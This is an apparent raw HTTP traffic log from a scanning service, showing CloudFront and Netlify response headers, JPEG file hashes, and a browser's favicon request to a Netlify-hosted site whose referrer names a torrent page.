content-type: image/jpeg
                                        
server: nginx
content-length: 8469
x-amzn-requestid: c17eff92-da62-4f0f-9e75-2741012ec43a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: co_sqFSjoAMFQ6w=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638d131d-61d61d2f0bb01ecb21b809ea;Sampled=0
x-amzn-remapped-date: Sun, 04 Dec 2022 21:37:33 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: TKSlCefkyQ7VDufJJOh1D7zhioft93jfOsoXxTD4ncAK5ktxlPvIoA==
via: 1.1 efe54e8b68e074d39b2ecd249f85100a.cloudfront.net (CloudFront), 1.1 112d82578d402a38d8d02e8b857617e0.cloudfront.net (CloudFront), 1.1 google
date: Mon, 05 Dec 2022 21:52:07 GMT
age: 7689
etag: "ff254a1df087d2c157d88a6ef04e395dc49efe5e"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8469
Md5:    2f60a6490f38a772dcd50a1132e98e1b
Sha1:   ff254a1df087d2c157d88a6ef04e395dc49efe5e
Sha256: 653e40becd103cd76cc2f194a87e933e8c548d346f87520fefca3b16430fc4ab
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: goodrubank.netlify.app
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://goodrubank.netlify.app/velichne-stolttya-roksolana-123-serya-torrent.html
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         35.246.229.114
HTTP/2 404 Not Found
content-type: text/html; charset=utf-8
                                        
age: 0
cache-control: public, max-age=0, must-revalidate
content-encoding: br
date: Tue, 06 Dec 2022 00:00:15 GMT
etag: 1571330968-ssl-df
server: Netlify
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
x-nf-request-id: 01GKJBQAQPHFDWTDKDVMHQFKN9
X-Firefox-Spdy: h2


--- Additional Info ---